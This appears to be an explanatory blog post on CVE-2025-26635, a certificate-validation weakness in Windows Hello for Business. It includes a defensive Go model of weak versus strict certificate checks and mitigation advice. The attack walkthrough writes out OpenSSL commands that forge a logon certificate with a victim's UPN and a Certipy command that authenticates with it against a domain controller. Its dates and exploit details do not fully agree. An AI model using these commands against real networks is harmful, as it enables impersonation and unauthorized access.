---
Summary:
CVE-2025-26635 exposes a critical weakness in Windows Hello’s network authentication. In this long read, we’ll break down what makes this vulnerability dangerous, explain how attackers can exploit it, go through some code examples, and share links to trusted resources for further reading. This is an exclusive, easy-to-understand guide for IT pros, security enthusiasts, and Windows users.
What Is CVE-2025-26635?
On April 2, 2025, Microsoft disclosed CVE-2025-26635, affecting Windows Hello, Microsoft’s biometric authentication feature (face, fingerprint, PIN). The flaw allows an attacker—who already has some level of access or is authorized—to bypass certain security features by exploiting weak authentication in the Windows Hello for Business network login out-of-the-box configuration.
Key Points
- Applies to: Windows 10/11 with Windows Hello for Business enabled
- Preconditions: Attacker must be authorized (valid user credentials or access token)
- Impact: Attacker can bypass additional security protections and log in as another user over the network
How the Vulnerability Works
Windows Hello uses certificate-based authentication for remote logins (like accessing files over SMB, RDP, etc.). However, in some configurations, Windows Hello for Business does not strictly validate all required certificate properties when authenticating users over the network.
If an attacker can obtain or forge a weak certificate that meets minimal requirements, they could "impersonate" a user and log in remotely—even bypassing facial recognition, PIN, or fingerprint checks.
Exploit Details – What an Attack Might Look Like
Suppose Alice uses Windows Hello to securely log into her work computer. Bob, an attacker who is a regular user on the same network, wants to log in as Alice over the network without knowing her PIN, password, or biometrics.
The Exploit Process
1. Obtain/Forge Weak Certificate
- Bob creates a certificate with Alice’s User Principal Name (UPN) in the Subject Alternative Name (SAN) field.
2. Authenticate Over the Network
- Bob leverages the weak network policy, using protocols like SMB, WinRM, or RDP, specifying the crafted certificate.
3. Bypass Windows Hello’s Strong Local Checks
- Since network authentication doesn't validate the certificate chain and the weak rules allow the logon, Bob is in.
Here’s a basic snippet (NOT FOR MALICIOUS USE – educational only):
openssl req -new -newkey rsa:2048 -nodes -out malicious.csr -keyout malicious.key -subj "/CN=Alice User"
Create an OpenSSL config (san.cnf):
[req]
distinguished_name=req
req_extensions=v3_req
prompt=no
[v3_req]
subjectAltName=otherName:1.3.6.1.4.1.311.20.2.3;UTF8:AADalice@contoso.com
Then sign your CSR:
openssl x509 -req -in malicious.csr -CA rootCA.pem -CAkey rootCA.key -out malicious.crt -days 365 -extfile san.cnf -extensions v3_req
Bob now has a fake "smartcard" certificate as Alice. With the right tooling (Rubeus, certipy, or pkinittools), he could now attempt to connect over the network.
Example Attack With Certipy
Certipy (GitHub) is a tool for abusing AD certificate services.
certipy auth -cert malicious.crt -key malicious.key -username alice@contoso.com -dc-ip 192.168.1.5
Mitigation and Hardening
Patch All Windows Devices
- Always install the latest updates from Windows Update or Microsoft Update Guide.
Harden Certificate Validation
- Force strong validation of smartcard/certificates using group policy.
- Reference: Configure Windows Hello for Business certificate policies
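The validation gap described under "How the Vulnerability Works", and the strict validation this hardening item calls for, side by side as an added Go example (not code from this post, from Microsoft, or from any tool the post mentions). It builds two constructed CAs, one trusted enterprise CA and one untrusted CA, issues a logon certificate carrying the same UPN (alice@contoso.com, a constructed sample value) from each, and evaluates both certificates under two policies: a name-only match that models the weak configuration the advisory describes, and a strict policy that first requires a chain to the trusted root and the client-authentication EKU before it compares the UPN. The function names (issue, logonAllowed, RunScenario) are this example's own, and the two policies are a model of the check, not Windows' logon code.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/x509"
	"crypto/x509/pkix"
	"encoding/asn1"
	"errors"
	"fmt"
	"math/big"
	"strings"
	"time"
)

// subjectAltName, the Microsoft UPN otherName type used in the openssl config above, and the
// shape of that name: otherName ::= SEQUENCE { type-id OBJECT IDENTIFIER, value [0] EXPLICIT ANY }
var oidSAN, oidUPN = asn1.ObjectIdentifier{2, 5, 29, 17}, asn1.ObjectIdentifier{1, 3, 6, 1, 4, 1, 311, 20, 2, 3}
type otherName struct {
	TypeID asn1.ObjectIdentifier
	Value  asn1.RawValue `asn1:"tag:0,explicit"`
}

func must[T any](v T, err error) T {
	if err != nil {
		panic(err)
	}
	return v
}

// upnSANExtension encodes a subjectAltName holding a single UPN otherName ([0] IMPLICIT in GeneralName).
func upnSANExtension(upn string) []byte {
	utf8 := must(asn1.MarshalWithParams(upn, "utf8"))
	gn := must(asn1.MarshalWithParams(otherName{oidUPN, asn1.RawValue{Class: asn1.ClassContextSpecific, Tag: 0, IsCompound: true, Bytes: utf8}}, "tag:0"))
	return must(asn1.Marshal([]asn1.RawValue{{FullBytes: gn}})) // GeneralNames ::= SEQUENCE OF GeneralName
}

// upnFromCert returns the UPN otherName from the SAN extension, or an error if there is none.
func upnFromCert(cert *x509.Certificate) (upn string, err error) {
	for _, ext := range cert.Extensions {
		var names []asn1.RawValue
		if _, err = asn1.Unmarshal(ext.Value, &names); err != nil || !ext.Id.Equal(oidSAN) {
			continue // not the SAN extension, or one that does not parse as GeneralNames
		}
		for _, gn := range names { // skip names that are not otherName, or otherNames of another type
			var on otherName
			if _, err = asn1.UnmarshalWithParams(gn.FullBytes, &on, "tag:0"); err == nil && on.TypeID.Equal(oidUPN) {
				_, err = asn1.Unmarshal(on.Value.Bytes, &upn)
				return upn, err
			}
		}
	}
	return "", errors.New("no UPN otherName in subjectAltName")
}

// issue makes a constructed test cert: a self-signed CA named name if ca is nil, else a client-auth cert from ca carrying name as its SAN UPN.
func issue(name string, ca *x509.Certificate, caKey *ecdsa.PrivateKey) (*x509.Certificate, *ecdsa.PrivateKey) {
	key := must(ecdsa.GenerateKey(elliptic.P256(), rand.Reader))
	tmpl := &x509.Certificate{SerialNumber: big.NewInt(1), Subject: pkix.Name{CommonName: name},
		NotBefore: time.Now().Add(-time.Hour), NotAfter: time.Now().Add(24 * time.Hour)}
	if ca == nil {
		tmpl.IsCA, tmpl.BasicConstraintsValid, tmpl.KeyUsage, ca, caKey = true, true, x509.KeyUsageCertSign, tmpl, key
	} else {
		tmpl.KeyUsage, tmpl.ExtKeyUsage = x509.KeyUsageDigitalSignature, []x509.ExtKeyUsage{x509.ExtKeyUsageClientAuth}
		tmpl.ExtraExtensions = []pkix.Extension{{Id: oidSAN, Value: upnSANExtension(name)}}
	}
	der := must(x509.CreateCertificate(rand.Reader, tmpl, ca, &key.PublicKey, caKey))
	return must(x509.ParseCertificate(der)), key
}

// logonAllowed decides whether cert may log on as account. strict=false is the weak name-only match
// the advisory describes; strict=true first demands a chain to a trusted root and the client-auth EKU.
func logonAllowed(cert *x509.Certificate, account string, roots *x509.CertPool, strict bool) error {
	if _, err := cert.Verify(x509.VerifyOptions{Roots: roots, KeyUsages: []x509.ExtKeyUsage{x509.ExtKeyUsageClientAuth}}); strict && err != nil { // the weak policy ignores the chain result
		return errors.New("chain validation failed: " + err.Error())
	}
	if upn, err := upnFromCert(cert); err != nil || !strings.EqualFold(upn, account) {
		return errors.New("certificate does not carry the UPN " + account)
	}
	return nil
}

// RunScenario issues one logon certificate per CA for the same UPN and reports both policies' decisions (true = allowed).
func RunScenario() (weakLegit, strictLegit, weakForged, strictForged bool) {
	const account = "alice@contoso.com" // constructed sample account
	entCA, entKey := issue("Contoso Enterprise CA (constructed)", nil, nil)
	otherCA, otherKey := issue("Untrusted CA (constructed)", nil, nil)
	roots := x509.NewCertPool()
	roots.AddCert(entCA) // only the enterprise CA may vouch for logon certificates
	legit, _ := issue(account, entCA, entKey)
	forged, _ := issue(account, otherCA, otherKey)
	allowed := func(c *x509.Certificate, strict bool) bool { return logonAllowed(c, account, roots, strict) == nil }
	return allowed(legit, false), allowed(legit, true), allowed(forged, false), allowed(forged, true)
}

func main() {
	fmt.Println(RunScenario()) // enterprise cert: weak, strict; untrusted cert: weak, strict
}
```

Running it prints `true true true false`: the enterprise-issued certificate passes both policies, while the certificate from the untrusted CA passes the name-only match (the weakness) and fails as soon as the chain is checked. Production Active Directory goes further than UPN matching: since KB5014754, domain controllers bind certificates to accounts through strong mappings (the SID extension), which this model does not include.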
References and Further Reading
- Microsoft - CVE-2025-26635 Advisory
- Windows Hello for Business Documentation
- Certipy (GitHub Tool)
- OpenSSL Documentation
- harmj0y - Cert Abuse in AD
Final Thoughts
CVE-2025-26635 highlights the real dangers of weak authentication, even in supposedly "secure" biometric systems like Windows Hello. While the exploit requires some user privileges and certificate/AD knowledge, it is highly effective on unpatched or poorly configured networks.
Always keep systems updated, review your certificate issuance processes, and monitor for suspicious activity related to certificates and smartcards.
Stay safe, stay patched!
*This post is exclusively written in plain English for readability and practical use — please share with your IT and security teams!*
Timeline
Published on: 04/08/2025 18:15:47 UTC
Last modified on: 06/04/2025 17:52:57 UTC